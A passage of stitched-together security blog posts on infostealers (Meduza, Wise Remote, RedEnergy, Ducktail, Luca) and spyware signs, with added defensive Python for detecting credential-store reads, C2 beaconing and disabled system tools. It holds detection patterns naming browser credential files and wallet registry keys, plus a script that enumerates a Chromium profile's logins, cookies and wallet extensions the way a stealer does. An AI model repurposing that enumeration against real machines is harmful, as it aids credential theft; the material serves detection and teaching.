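# Registry keys quoted in the post (prefix match, case-insensitive).
WATCHED_REGISTRY_KEYS = (
    r"HKCU\Software\Valve\Steam",
    r"HKCU\SOFTWARE\Etherdyne\Etherwall\geth",
    r"HKCU\SOFTWARE\monero-project\monero-core",
    r"HKCU\SOFTWARE\BitcoinCore\BitcoinCore-Qt",
)

# Chromium keeps passwords in "Login Data" and cookies in "Cookies"; Firefox in
# logins.json + key4.db and cookies.sqlite. All are SQLite or JSON files.
CREDENTIAL_FILE_RE = re.compile(
    r"\\(Login Data|Cookies|logins\.json|key4\.db|cookies\.sqlite)$", re.I)
# Chromium extension storage: ...\Local Extension Settings\<32-char a-p id>\...
EXTENSION_STORE_RE = re.compile(r"\\Local Extension Settings\\([a-p]{32})(\\|$)", re.I)

# Images expected to open these stores. Assumption: tune this per fleet (a
# password-manager sync client or backup agent would be added here).
EXPECTED_READERS = {
    "chrome.exe", "msedge.exe", "firefox.exe", "opera.exe",
    "brave.exe", "vivaldi.exe", "steam.exe",
}


@dataclass
class Event:
    kind: str    # "file" or "registry"
    image: str   # process image name, e.g. "chrome.exe"
    target: str  # file path or registry key that was read


def classify(ev: Event) -> Optional[str]:
    """Return why the event looks like credential harvesting, or None."""
    reason = None
    if ev.kind == "file":
        m = EXTENSION_STORE_RE.search(ev.target)
        if m and m.group(1).lower() in WATCHED_EXTENSION_IDS:
            reason = f"extension storage read ({m.group(1).lower()})"
        elif CREDENTIAL_FILE_RE.search(ev.target):
            reason = "browser credential/cookie store read"
    elif ev.kind == "registry":
        for key in WATCHED_REGISTRY_KEYS:
            if ev.target.lower().startswith(key.lower()):
                reason = f"registry read of {key}"
                break
    # The legitimate owner of a store is allowed to open it.
    if reason and ev.image.lower() in EXPECTED_READERS:
        return None
    return reason


def alerts(events, min_distinct_hits: int = 2) -> dict:
    """Group suspicious reads per process and alert on a sweep, not a single file.

    One read of one store can be a backup tool; a stealer sweeps many stores in
    one run, so require several distinct reasons for the same image.
    """
    hits = defaultdict(list)
    for ev in events:
        reason = classify(ev)
        if reason and reason not in hits[ev.image.lower()]:
            hits[ev.image.lower()].append(reason)
    return {img: r for img, r in hits.items() if len(r) >= min_distinct_hits}


# Constructed telemetry: a browser and Steam doing their own thing, a backup
# agent touching one file, and an unknown binary (placeholder name) sweeping.
CHROME_PROFILE = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default"
SAMPLE_EVENTS = [
    Event("file", "chrome.exe", CHROME_PROFILE + r"\Login Data"),
    Event("registry", "steam.exe", r"HKCU\Software\Valve\Steam\Users"),
    Event("file", "updater-helper.exe", CHROME_PROFILE + r"\Login Data"),
    Event("file", "updater-helper.exe", CHROME_PROFILE
          + r"\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb\000003.log"),
    Event("registry", "updater-helper.exe", r"HKCU\SOFTWARE\monero-project\monero-core"),
    Event("file", "backup-agent.exe", CHROME_PROFILE + r"\Cookies"),
    Event("file", "updater-helper.exe", r"C:\Users\alice\Documents\notes.txt"),
]

if __name__ == "__main__":
    for image, reasons in alerts(SAMPLE_EVENTS).items():
        print(f"ALERT {image}: " + "; ".join(reasons))
```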

System fingerprinting

To tell the attacked systems apart, stealers commonly collect some trivial information about the system. Meduza is no exception: it collects all the basic details that identify a computer among others.

  • System build details
  • Username
  • Computer name
  • Screen Resolution details
  • Screenshot
  • OS details
  • CPU details
  • RAM details
  • GPU
  • Hardware ID details
  • Execution path
  • Public IP
  • Geo
  • Time
  • TimeZone

Another use for such data becomes clear when we remember that Meduza also collects browser cookies. The combination of cookies, passwords and system information allows creating a complete copy of the device, at least from the point of view of a website. There are even Darknet services dedicated specifically to system profile spoofing: you feed in the cookies and system specs, and the service makes your system indistinguishable from the original one. This helps circumvent even the most sophisticated protection mechanisms.

Data extraction

All the data Meduza Stealer collects from the infected system is stored in a dedicated folder created once the malware unpacks and runs. When it comes to sending the data to the command server, the malware archives it and uploads the archive, nothing unusual there. Since the malware uses an encrypted connection for C&C communication, the exfiltration is not that easy to spot.

Code responsible for the C2 server connection in Meduza Stealer.

Unlike the “classic” stealers such as Vidar, Meduza does not self-destruct once it finishes collecting data. It keeps running in the background, periodically pinging the C2 and waiting for commands. There is a self-removal command, but it is most likely sent only in exceptional cases.
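Since the channel is encrypted, payload inspection is out; what the periodic pings leave behind is timing. The following is an added example, not code from Meduza or from the post: over constructed connection records (placeholder host names, RFC 5737 documentation addresses), it groups flows per source/destination pair and flags pairs whose inter-connection intervals barely vary. The thresholds are assumptions to tune per environment.

```python
"""Find a resident implant by the regularity of its C2 pings."""
from collections import defaultdict
from datetime import datetime
from statistics import median

MIN_CONNECTIONS = 5      # fewer samples than this say nothing about periodicity
MAX_JITTER_RATIO = 0.2   # MAD of intervals / median interval; tune per environment

# Constructed records: "<ISO time> <source host> <destination:port> <bytes sent>"
SAMPLE_FLOWS = """\
2023-07-01T10:00:00 ws-17 203.0.113.10:443 812
2023-07-01T10:00:03 ws-17 198.51.100.5:443 15021
2023-07-01T10:00:10 ws-17 198.51.100.5:443 640
2023-07-01T10:01:00 ws-17 203.0.113.10:443 810
2023-07-01T10:01:41 ws-17 198.51.100.5:443 3210
2023-07-01T10:02:01 ws-17 203.0.113.10:443 812
2023-07-01T10:02:30 ws-17 192.0.2.7:80 120
2023-07-01T10:02:59 ws-17 203.0.113.10:443 811
2023-07-01T10:03:22 ws-17 198.51.100.5:443 90
2023-07-01T10:03:30 ws-17 192.0.2.7:80 118
2023-07-01T10:04:00 ws-17 203.0.113.10:443 812
2023-07-01T10:05:00 ws-17 203.0.113.10:443 809
2023-07-01T10:07:10 ws-17 198.51.100.5:443 44000
"""


def parse_flows(text: str):
    """Parse the whitespace-separated records above into (time, src, dst, bytes)."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, nbytes = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(nbytes)))
    return flows


def intervals_by_pair(flows):
    """Seconds between consecutive connections, per (src, dst) pair."""
    times = defaultdict(list)
    for ts, src, dst, _ in flows:
        times[(src, dst)].append(ts)
    out = {}
    for pair, ts_list in times.items():
        ts_list.sort()
        out[pair] = [(b - a).total_seconds() for a, b in zip(ts_list, ts_list[1:])]
    return out


def jitter_ratio(intervals):
    """Median absolute deviation relative to the median; 0 means a perfect clock.

    Median/MAD rather than mean/stdev so one long gap (laptop asleep) does not
    hide an otherwise rigid schedule.
    """
    med = median(intervals)
    if med <= 0:          # duplicate timestamps; nothing sensible to say
        return None
    mad = median(abs(i - med) for i in intervals)
    return mad / med


def find_beacons(flows, min_connections=MIN_CONNECTIONS, max_jitter=MAX_JITTER_RATIO):
    """Return {(src, dst): {"period_s", "jitter_ratio"}} for beacon-like pairs."""
    beacons = {}
    for pair, ivals in intervals_by_pair(flows).items():
        if len(ivals) + 1 < min_connections:
            continue
        ratio = jitter_ratio(ivals)
        if ratio is not None and ratio <= max_jitter:
            beacons[pair] = {"period_s": median(ivals), "jitter_ratio": round(ratio, 3)}
    return beacons


if __name__ == "__main__":
    for (src, dst), info in find_beacons(parse_flows(SAMPLE_FLOWS)).items():
        print(f"{src} -> {dst}: every ~{info['period_s']:.0f}s, jitter {info['jitter_ratio']}")
```

In the sample, the pair to 203.0.113.10 has a near-constant 60-second cadence, the pair to 198.51.100.5 has irregular intervals (normal browsing), and the pair to 192.0.2.7 has too few connections to judge.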

How to protect against Meduza Stealer?

The ways to protect against Meduza are largely the same as for any other stealer. The difference is dictated by this malware’s exceptional detection evasion capabilities: to prevent Meduza Stealer activity efficiently, strong heuristic protection is essential.

Be careful with everything that can act as a malware source. Email spam and phishing posts on social media are among the most exploited ways of spreading malware. A less popular, but sometimes even more efficient, approach is abusing Google Ads in search results. Fraudsters will do their best to make you believe the thing is legitimate and that there is nothing to fear in interacting with it.

Implement preventive anti-malware measures. To weed out malware with such an unusual detection evasion model, the program should include a sturdy heuristic engine. Additionally, look for solutions with email protection functions and CDR (Content Disarm and Reconstruction) applications; they help secure one of the likely attack vectors.


Avoid cracked software. Yet another place used for spreading malware is cracked programs; they have served this purpose for over two decades now. Even though their share has shrunk in recent years, you can still get something nasty from there: a dropper delivered through a program crack, which then injects anything from spyware to ransomware.

Wise Remote Trojan: Infostealer, RAT, DDoS Bot, and Ransomware
https://gridinsoft.com/blogs/wise-remote-trojan-infostealer-rat-ddos-bot-and-ransomware/
Mon, 10 Jul 2023 18:30:46 +0000

Wise Remote Stealer is a potent and malicious software that operates as an infostealer, Remote Access Trojan (RAT), DDoS bot, and ransomware. It has gained notoriety within the cybersecurity community due to its extensive range of capabilities and the threat it poses to individuals and organizations.

Unveiling the Wise Remote Stealer

Revelations from cybersecurity experts have shed light on a concerning development in the underbelly of the internet: a burgeoning menace known as “Wise Remote”. This pernicious malware, operating as Malware-as-a-Service (MaaS), has emerged as a highly adaptable and insidious tool. Its capabilities encompass remote access, DDoS botnet recruitment, data theft and even extortion, raising the alarm for organizations and individuals alike.

The Stealthy Proliferation of Wise Remote Stealer

Wise Remote Stealer on cracked[.]io forum

Since its initial appearance in early June, Wise Remote Stealer has been making waves across hacker forums such as HF and cracked-io. Its shadowy creators tirelessly refine and enhance their creation, showcasing its malevolence on platforms like Discord and Telegram. Disturbingly, these demonstrations have ensnared and impacted the lives of over a thousand unsuspecting victims, cementing its reputation as a significant threat.

Engineered using a combination of programming languages, including Go, C++, C# and Python, Wise Remote primarily targets Windows 8, 10 and 11. Its developers exhibit an astute ability to elude conventional antivirus measures, employing various evasion techniques. To further cloak their operations, all communication with the command-and-control (C2) server, hosted in Switzerland, is encrypted.

The Tactical Ingenuity of Wise Remote

Wise Remote operates with calculated precision, showcasing a level of sophistication that sets it apart from other malicious tools. Through cloud-based module imports and strategic data storage within the victim’s disk, it carefully conceals its activities. Once the sensitive information has been exfiltrated, the malware meticulously erases all traces, leaving behind no digital footprints.

Subscribers to this nefarious service gain access to a comprehensive builder, allowing for customization and fine-tuning of the malware’s appearance and behavior. Remarkably, the resulting payloads rarely exceed 100 kilobytes, facilitating rapid dissemination and maximizing its reach.

The existing capabilities of Wise Remote Stealer are indeed alarming:

  • Systematic collection of extensive system information, providing cybercriminals with a wealth of valuable data.
  • Creation of a potent reverse shell, granting complete remote access and control over the compromised system.
  • Facilitation of additional malicious file downloads and executions, enabling expansion of the attack surface.
  • Extraction of critical data from web browsers, encompassing saved passwords, cookies, banking credentials, bookmarks, browsing history, and installed extensions, resulting in a treasure trove of personal information.
  • Theft of funds from unsuspecting victims’ cryptocurrency wallets, inflicting significant financial damage.
  • Seamless covert operation, opening and interacting with websites undetected, masquerading as legitimate user activity.
  • Stealthy capture of screenshots, potentially compromising sensitive and confidential information.
  • Utilization of the AppData folder as a discreet repository for surreptitiously uploaded files.
  • Empowerment of attackers to customize and tailor malicious agents and modules to suit specific targets and preferred attack vectors.
  • Camouflaging its tracks by manipulating system logs, erasing any trace of malicious activities, evading detection.

The Command Hub of Wise Remote

Serving as the central command hub, Wise Remote boasts a potent control panel that bestows unprecedented oversight and control over a vast network of up to 10,000 infected machines. With a single command, the operator can unleash devastating DDoS attacks or orchestrate a range of malicious activities, amplifying the disruptive potential of this malware.


As the cybersecurity community races to counter this emerging threat, the significance of Wise Remote becomes increasingly evident. Its adaptability, sophistication, and capacity for stealth underline the need for robust security measures and unwavering vigilance in today’s rapidly evolving digital landscape.

RedEnergy Stealer-as-a-Ransomware On The Rise
https://gridinsoft.com/blogs/redenergy-stealer-as-a-ransomware/
Tue, 04 Jul 2023 13:10:28 +0000

Researchers have discovered a new form of malware called RedEnergy Stealer. It is categorized as Stealer-as-a-Ransomware but is not affiliated with the Australian company Red Energy.

The RedEnergy stealer uses a sneaky tactic to steal sensitive data from various web browsers. Its main way of spreading is fake updates: pop-ups and banners that bait the user into installing what looks like a browser update but is in fact the malicious payload. RedEnergy also has multiple modules that can carry out ransomware activities. Despite using common method names, the malware has kept its original name. RedEnergy is classified as Stealer-as-a-Ransomware because it can function both as a stealer and as ransomware.

Detection names on VirusTotal site

What is RedEnergy Malware?

RedEnergy is malware designed to look like a legitimate browser update, tricking users into downloading and installing it. It imitates well-known browsers like Google Chrome, Microsoft Edge, Firefox and Opera, and once triggered it drops four files (two temporary files and two executables) onto the targeted system. One of these files contains the malicious payload and starts a background process. Once executed, the payload displays an insulting message to the victim.

RedEnergy infection chain

RedEnergy also persists on an infected system across restarts and shutdowns, which lets it continue its harmful activity uninterrupted. As part of its operation, it encrypts the victim’s data and appends the “.FACKOFF!” extension to every encrypted file. It then demands payment to restore access to the files through a ransom note (“read_it.txt”) and changes the desktop wallpaper.

Encrypted files with the .FACKOFF! extension

One of the things the ransomware does is delete the shadow copies, which means any backups kept there are erased. In addition, the malware modifies the desktop.ini file, which holds basic settings for file system folders. By doing this, RedEnergy can alter the appearance of folders, making it easier to hide its activity on the system. Lastly, RedEnergy can also steal data from various web browsers, potentially giving it access to personal information, login details, financial data, online activity, session-related information and other essential data.

Threat Summary

Name: RedEnergy Stealer-as-a-Ransomware
Threat Type: Information stealer, ransomware
Encrypted Files Extension: .FACKOFF!
Ransom Demanding Message: read_it.txt
Cyber Criminal Contact: georger1212@proton.me
Ransom Amount: 0.005 BTC

How does RedEnergy Malware work?

This threat campaign uses a deceitful redirection technique to trick users. When users try to access the targeted company’s website through their LinkedIn profile, they are unknowingly sent to a malicious website. On this website, they are asked to download what seems like a legitimate browser update, presented as four different browser icons. However, this is a trap, and the unsuspecting user downloads an executable file called RedStealer instead of an actual update.

Example of a malicious download site

The deceptive campaign also uses a misleading download domain, www[.]igrejaatos2[.]org. The domain poses as a ChatGPT site, but it is counterfeit and aims to trick victims into downloading a fake offline version of ChatGPT. The zip file contains the same malicious executable as before, and victims unknowingly acquire it upon downloading.


How to avoid installation of RedEnergy Malware?

Individuals and organizations must exercise extreme caution when accessing websites, particularly those linked to LinkedIn profiles. Verifying browser updates’ authenticity and being wary of unexpected file downloads are paramount to protecting against such malicious campaigns.

To prevent negative consequences, there are several essential steps to take:

  • Update your operating system and software regularly.
  • Be cautious with email attachments and suspicious links, especially from unknown sources.
  • Use reliable antivirus or anti-malware software for extra protection and run regular system scans.
  • Avoid downloading files from untrusted websites, and be wary of pop-up ads or misleading download buttons that may lead to harmful content.

Ducktail Infostealer Malware Targeting Facebook Business Accounts
https://gridinsoft.com/blogs/ducktail-malware-analysis/
Fri, 19 May 2023 21:36:12 +0000

Researchers discovered Ducktail Malware, which targets individuals and organizations on the Facebook Business/Ads platform. The malware steals browser cookies and uses authenticated Facebook sessions to access the victim’s account. As a result, the scammers gain access to Facebook Business through the victim’s account, which has sufficient access to do so. It is a particularly interesting behavior, as most stealer malware aims at cryptocurrency-related data, or even all data types at once.

What is Ducktail Malware?

Ducktail is malware built on .NET Core that predominantly targets individuals and employees who may have access to a Facebook Business account. The Ducktail campaign is believed to have been active since 2018. However, the author became actively involved in developing and distributing malware related to the DUCKTAIL operation in the second half of 2021. The chain of evidence suggests that the attacker’s motives are driven by financial considerations and that the cybercriminal behind the campaign hails from Vietnam.

As mentioned at the outset, the primary targets of this stealer were individuals who hold senior positions in clothing, footwear, and cosmetics companies, as well as employees involved in digital marketing, digital media, and human resources. However, the author is believed to have recently updated the malware, expanding its capabilities. The new version of Ducktail is written in PHP. Now it targets users with any level of access to Facebook Business accounts.

How does it work?

The Ducktail malware is designed to extract browser cookies and abuse social media sessions. In this way, the attacker obtains sensitive information from the victim’s social media accounts and, through them, from the Business accounts those users manage. The scammers then use that access to place advertisements for financial gain. We will now look at this process in more detail.

Ducktail’s algorithm of actions in one picture

Delivery

To infect a target device, attackers use time-tested social engineering. I have repeatedly mentioned that the weakest link in any defense is the human factor, so this tactic will always be relevant. First, scammers place a malicious file on popular cloud storage. They typically use Google Drive, OneDrive, Mega, MediaFire, Discord, Trello, iCloud, and Dropbox. Next, they trick the victim into downloading and opening the malicious file. To do this, hackers contact the victim via social networks, and send a link to the archive. To make it look more legitimate, they pick a name like “Project Information And Salary Details At AVALON ORGANICS.zip”. Consequently, no suspicion is raised by the victim.

Archive contents: the file is not what it claims to be

Inside the archive, there may be some thematic images (e.g., images of cosmetics, if the target is a cosmetics company) and what look like PDF document files. In reality, these are executable files disguised as documents, as checking the file extension reveals. These files are the actual payloads: .NET assemblies that carry both executable sections and DLLs.

Info Stealing

Once launched, Ducktail scans web browsers, mainly Google Chrome, Mozilla Firefox, Microsoft Edge, and Brave Browser. The malware extracts all stored cookies as well as access tokens. It is also interested in information such as name, user ID, email address, and date of birth from the victim’s Facebook account. The malware scans registry data in HKLM\SOFTWARE\WOW6432Node\Clients\StartMenuInternet to get each installed browser’s name, path, and icon path.

Hacking process

Ducktail uses the victim’s social media session cookie and the other security credentials it has obtained. This allows it to interact directly with other social media endpoints from the victim’s computer, extracting information from the victim’s social media account. In addition, the malware checks whether two-factor authentication is enabled and, if so, tries to obtain recovery codes. It can also steal access tokens, IP addresses, user agents, and data from the business and advertising accounts connected to the victim’s personal account. This allows attackers to hijack these accounts and add their own email addresses to gain admin and finance editor access.

While the former is self-explanatory, administrator rights give complete control over the Facebook Business account. Finance editor rights allow changing the credit card information and financial details of the business, such as transactions, bills, account charges and payment methods. Because Ducktail accesses this information by sending requests from the victim’s computer, it impersonates the legitimate user and their session. This is achieved by hiding its activity behind the victim’s IP address, cookie values and system configuration. In addition to the data already obtained, the malware attempts to get the following information from the Facebook Business page:

  • Payment initiated
  • Payment required
  • Verification Status
  • Owner ad accounts
  • Amount spent
  • Currency details
  • Account status
  • Ads Payment cycle
  • Funding source
  • Payment method [ credit card, debit card, etc.]
  • Paypal Payment method [email address]
  • Owned pages.

Exfiltration

As its C&C channel, Ducktail uses the Telegram messenger. The fraudsters use the Telegram.Bot client library, which makes it easy to upload a file to a chat with a Telegram bot. Finally, the malware runs an infinite loop in the background, establishing a continuous exfiltration process.

How to protect yourself?

Ducktail is a narrowly targeted information stealer that can cause severe financial losses and identity theft. Its authors constantly make changes and improve the delivery mechanisms and approaches to stealing sensitive user information. However, the following tips can help you keep the chances of infection to a minimum:

Ducktail IoCs


Spyware Attack: Red Flags You’re Dealing With Spyware
https://gridinsoft.com/blogs/signs-of-spyware-attack/
Thu, 01 Dec 2022 22:35:30 +0000

Spyware is probably one of the oldest, yet most dangerous, types of malware. As the name suggests, spyware is software that spies on you while you use your computer or mobile device. To recognize when you have been infected and take steps to remove spyware, it is essential to know its possible signs. Having malware protection installed does not mean you can ignore those signs: the software can undoubtedly protect you, but it is not perfect. A brand-new zero-day malware attack may take time to be detected, at least until your protection provider releases an update. But what is spyware? How can you spot it and protect your devices from it? Read on to learn more about this cyber threat.

What is spyware?

Spyware is any software that collects and transmits information covertly without the user’s consent. It is used to collect target information, usually passwords, credit card and financial information, system files, and sometimes for keylogging or screen captures. There are different types of spyware, and below, we’ll look at the most popular ones. We’ll also look at clear signs that you’re dealing with spyware examples, and give you some security tips.

Red Flags You’re Dealing With Spyware Examples

Unfortunately, it is tough to detect spyware without special tools. This malware type is designed specifically to be stealthy. Visual detection of its activity is an exclusive case, which still does not mean its successful removal. However, some red flags clearly indicate that there is something wrong with your device:

Your System Tools Are Disabled

An attentive user who suspects malware might open Task Manager to find the culprit behind abnormal PC behavior, or check the settings with the Registry Editor. If, when you try to run these or other system tools, you suddenly get a message that your administrator has disabled them, it may well be the malware on your system protecting itself.

When you press Ctrl + Alt + Delete, instead of the Task Manager you see the message “Task Manager has been disabled by your administrator.”
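That message is produced by policy values in the registry, so the red flag can be checked directly rather than by waiting for the dialog. The following is an added example, not from the post: evaluate_policies() judges a snapshot of those values and runs anywhere, while read_live_policies() reads them through winreg on Windows and returns an empty dict elsewhere; the snapshot below is constructed, and the rule "any non-zero value counts" is an assumption stated in the comments.

```python
"""Check the policy values behind "has been disabled by your administrator"."""
import sys

# Value name -> subkey (checked under both HKCU and HKLM).
POLICY_VALUES = {
    "DisableTaskMgr": r"Software\Microsoft\Windows\CurrentVersion\Policies\System",
    "DisableRegistryTools": r"Software\Microsoft\Windows\CurrentVersion\Policies\System",
    "DisableCMD": r"Software\Policies\Microsoft\Windows\System",
}
TOOL_FOR_VALUE = {
    "DisableTaskMgr": "Task Manager",
    "DisableRegistryTools": "Registry Editor",
    "DisableCMD": "Command Prompt",
}


def evaluate_policies(snapshot: dict) -> list:
    """Turn {"HIVE\\subkey\\ValueName": data} into findings for set values.

    Assumption: any non-zero DWORD restricts the tool (DisableCMD=2 still
    allows batch scripts, but the interactive prompt is gone), so != 0 is
    the test. On a home PC with no domain policy, a finding here matches the
    self-protection behaviour described above.
    """
    findings = []
    for full_path, data in snapshot.items():
        hive_and_key, _, name = full_path.rpartition("\\")
        if name in POLICY_VALUES and isinstance(data, int) and data != 0:
            findings.append(f"{TOOL_FOR_VALUE[name]} disabled by {hive_and_key}\\{name}={data}")
    return findings


def read_live_policies() -> dict:
    """Read the values from the live registry; empty dict when not on Windows."""
    if sys.platform != "win32":
        return {}
    import winreg  # only importable on Windows
    snapshot = {}
    hives = (("HKCU", winreg.HKEY_CURRENT_USER), ("HKLM", winreg.HKEY_LOCAL_MACHINE))
    for hive_name, hive in hives:
        for name, subkey in POLICY_VALUES.items():
            try:
                with winreg.OpenKey(hive, subkey) as key:
                    data, _ = winreg.QueryValueEx(key, name)
            except OSError:      # key or value absent: policy not set
                continue
            snapshot[f"{hive_name}\\{subkey}\\{name}"] = data
    return snapshot


# Constructed snapshot standing in for an infected home PC: the Task Manager
# policy is set, the Registry Editor policy is present but zero.
CONSTRUCTED_SNAPSHOT = {
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr": 1,
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools": 0,
}

if __name__ == "__main__":
    live = read_live_policies()
    for finding in evaluate_policies(live or CONSTRUCTED_SNAPSHOT):
        print("FINDING:", finding)
```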

Strange processes in Task Manager

Although spyware works in stealth mode and reads information about the system, the user’s actions, and Internet activity, sometimes it can still show up somewhere or leave a trace in the form of a file. However, even if you find an uninvited guest in your system, you should not expect such a program to have a convenient removal function.


Suspicious network activity

Once the spyware collects enough data, it sends it to the attacker. Depending on the size of that data, your Internet speed may drop because the bandwidth is taken up. In addition, if you have a limited Internet plan, this can lead to additional costs. At the data extraction stage, you may also notice a strange archive somewhere in your file system.

What types of spyware are there?

Although spyware is one category among many types of malware, it can be classified into several other categories. Hackers use different methods to spy on you. Below we will look at the most common ones:

Keyloggers

Keyloggers are probably one of the oldest forms of spyware. They can be either software or hardware. Their purpose is to intercept your keystrokes and transmit them to an intruder. This allows keyloggers to piece together everything you type. However, they are particularly interested in collecting passwords, social security numbers, or anything else that might enable them to impersonate you.

Password stealers

Password stealers are somewhat similar to keyloggers but a bit more sophisticated. Instead of recording all keystrokes, password stealers look for files that can contain a password. Their modus operandi can vary. Some of them are keyloggers at their core, but with the use of complex algorithms to detect certain chains of symbols you type. Others work like Trojan viruses waiting to steal passwords.

Info stealers

Hackers develop info stealers to target certain data types directly on the victim’s computer. Info stealers often take the form of Trojans. Once a victim activates an info stealer, it collects information from the registry and files, including passwords and banking information, or even compromising photos or videos. There are also infostealers that aim precisely at a certain file type. Their general use is targeted attacks on a person who has valuable information on their PC.

Browser hijackers

Browser hijackers can modify your browser settings and redirect you to fraudulent websites you did not request. Although this type of malware has more in common with adware, it may also contain spyware components. Browsers hold a lot of personal information about you, so hackers are likely to find something valuable. Cookies, in particular, can give away your login credentials and choices on different sites. All this data is usually sold to third parties or used for phishing attacks by the same threat actors.

Packet sniffer

With a packet sniffer, cybercriminals can connect to a network and obtain all traffic passing through it. A hacker can gain access to login credentials and financial data by tracking Internet usage, including email and instant messages. That’s why sniffers can be dangerous, especially on unsecured Wi-Fi networks. Hackers can sniff unsecured public Wi-Fi networks, intercepting the traffic of anyone using them. Moreover, sniffers are sometimes present in the basic firmware of the network device – a widespread practice among Chinese manufacturers.

Commercial Spyware

Some companies sell monitoring software that you can knowingly install on your own devices. Parents, for example, use it to supervise their children on the Internet; this category is known as parental controls. Some employers use similar software to monitor employees. Although this is not illegal, such software still fits the technical definition of spyware.

How can I get infected with spyware?

There are different ways to get infected with spyware. Here are some of the most common:

  • Clicking on a pop-up window or tooltip without reading what it says
  • Opening email attachments from unknown senders
  • Downloading pirated movies, music, or games
  • Downloading legitimate files bundled with malware
The checkbox that is responsible for installing adware

What should I do if my system is infected with spyware?

If you suspect spyware has got onto your device, install a reputable antivirus application, update it manually so that its detection databases are current, and run a full scan. If the malware prevents you from installing an antivirus or running a scan, use an on-demand, clean-only scanner such as Trojan Killer instead. Once the immediate problem is dealt with, check your defences: make sure the antivirus is fully functional and its databases are up to date.

The post Spyware Attack: Red Flags You’re Dealing With Spyware appeared first on Gridinsoft Blog.

Luca Stealer Source Code Published In The Darknet
https://gridinsoft.com/blogs/luca-stealer-published-in-darknet/
Tue, 26 Jul 2022 16:29:58 +0000

Luca Stealer, a general-purpose information-stealing malware written in Rust, was published on a darknet forum in recent days. The source code of a well-made stealer is now available to anyone. It mainly targets web browsers, in particular the extensions and stored data that belong to cryptocurrency wallets and online banking.

Luca Stealer functionality

As analysts from Cyble state in their report, the feature set of Luca is similar to that of other stealers. It can extract data from Chromium-based web browsers and deliver several categories of information to the attacker: cookie files, Discord login tokens, accounts on game distribution platforms, credit card details and cryptocurrency wallets. The last two categories are obtained by going through the extensions installed in the browser. The malware compares the installed extensions against a built-in list and, on a match, steals the data those extensions store locally. This is a different technique from the one most stealers apply.
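To make the browser-data theft described in the spyware section above and in this paragraph concrete, here is an added audit script, written for this page and not taken from Cyble's analysis or from Luca's code, that enumerates what a stealer would find in a Chromium profile: saved-login origins and usernames from the Login Data database, cookie hosts, and installed extension IDs matched against a wallet watchlist, which is the extension-matching step Luca performs. It reads only a constructed sample profile built in a temporary directory; the MetaMask extension ID is real, the second watchlist entry is a placeholder, and nothing is decrypted.

```python
import sqlite3
import tempfile
from pathlib import Path

# Extension IDs the audit compares against the profile, mirroring the
# list-matching a stealer performs. The MetaMask ID is the real Chrome Web
# Store ID; the second entry is a constructed placeholder for this example.
WALLET_EXTENSION_IDS = {
    "nkbihfbeogaeaoehlefnkodbefgpgknn": "MetaMask",
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": "placeholder-wallet",
}


def _open_ro(db_path: Path) -> sqlite3.Connection:
    # Open read-only via a file: URI. A running browser keeps these files
    # locked on Windows, which is why stealers copy them before reading.
    return sqlite3.connect(db_path.as_uri() + "?mode=ro", uri=True)


def audit_profile(profile: Path) -> dict:
    """Summarise what an infostealer would harvest from a Chromium profile.

    Only on-disk artefacts are read: the 'Login Data' and 'Cookies' SQLite
    databases and the 'Local Extension Settings' directory. Nothing is
    decrypted: password_value and encrypted_value are ciphertext under a key
    kept in 'Local State' (DPAPI-protected on Windows); unwrapping that key
    is the extra step real stealers add on top of this enumeration.
    """
    result = {"saved_logins": [], "cookie_hosts": set(), "wallet_extensions": []}

    login_db = profile / "Login Data"
    if login_db.exists():
        con = _open_ro(login_db)
        for origin, user, blob in con.execute(
            "SELECT origin_url, username_value, password_value FROM logins"
        ):
            # Origin and username are plaintext; only the ciphertext length is recorded.
            result["saved_logins"].append((origin, user, len(blob)))
        con.close()

    cookie_db = profile / "Cookies"
    if cookie_db.exists():
        con = _open_ro(cookie_db)
        for (host,) in con.execute("SELECT DISTINCT host_key FROM cookies"):
            result["cookie_hosts"].add(host)
        con.close()

    ext_dir = profile / "Local Extension Settings"
    if ext_dir.is_dir():
        for entry in ext_dir.iterdir():
            if entry.name in WALLET_EXTENSION_IDS:
                result["wallet_extensions"].append(WALLET_EXTENSION_IDS[entry.name])
    return result


def build_sample_profile(root: Path) -> Path:
    """Create a minimal constructed Chromium-style profile for the demo."""
    profile = root / "Default"
    (profile / "Local Extension Settings" / "nkbihfbeogaeaoehlefnkodbefgpgknn").mkdir(parents=True)

    con = sqlite3.connect(profile / "Login Data")
    con.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    # Chromium prefixes AES-GCM ciphertext with 'v10'; the rest is dummy bytes here.
    con.execute("INSERT INTO logins VALUES (?, ?, ?)",
                ("https://bank.example/login", "alice", b"v10" + b"\x00" * 32))
    con.commit()
    con.close()

    con = sqlite3.connect(profile / "Cookies")
    con.execute("CREATE TABLE cookies (host_key TEXT, name TEXT, encrypted_value BLOB)")
    con.executemany("INSERT INTO cookies VALUES (?, ?, ?)", [
        (".discord.com", "token", b"v10dummy"),
        (".steampowered.com", "sessionid", b"v10dummy"),
    ])
    con.commit()
    con.close()
    return profile


def demo() -> dict:
    """Build the sample profile in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_profile(build_sample_profile(Path(tmp)))


if __name__ == "__main__":
    print(demo())
```

Run against a real profile directory, the same function shows why the article's advice to keep credentials out of the browser matters: everything except the password ciphertext is readable by any process running as the user, and the key to that ciphertext sits in the same profile.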

The list of cryptowallets Luca Stealer attacks

Besides the categories of data mentioned above, Luca Stealer also collects information about the attacked system. Through specific system calls it retrieves the amount of RAM, the swap file size, the number of CPU cores and similar details. After finishing collection, Luca packs everything into a zip archive and sends it either via a Discord webhook or through a Telegram bot; which channel it uses depends on the size of the resulting file.
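The Discord-webhook and Telegram-bot exfiltration just described is something a SOC can hunt for in proxy logs. The detector below is an added example for this page, not part of the Cyble analysis, and runs over constructed log lines in an assumed "timestamp client method url status bytes" format; the API hostnames and path shapes are real, while the webhook ID, the bot token and the 1 MB upload threshold are assumptions.

```python
import re
from urllib.parse import urlparse

# The two channels described for Luca: Discord webhooks and the Telegram Bot
# API. Hostnames and path shapes are the real APIs; the webhook ID and bot
# token in the sample log below are constructed.
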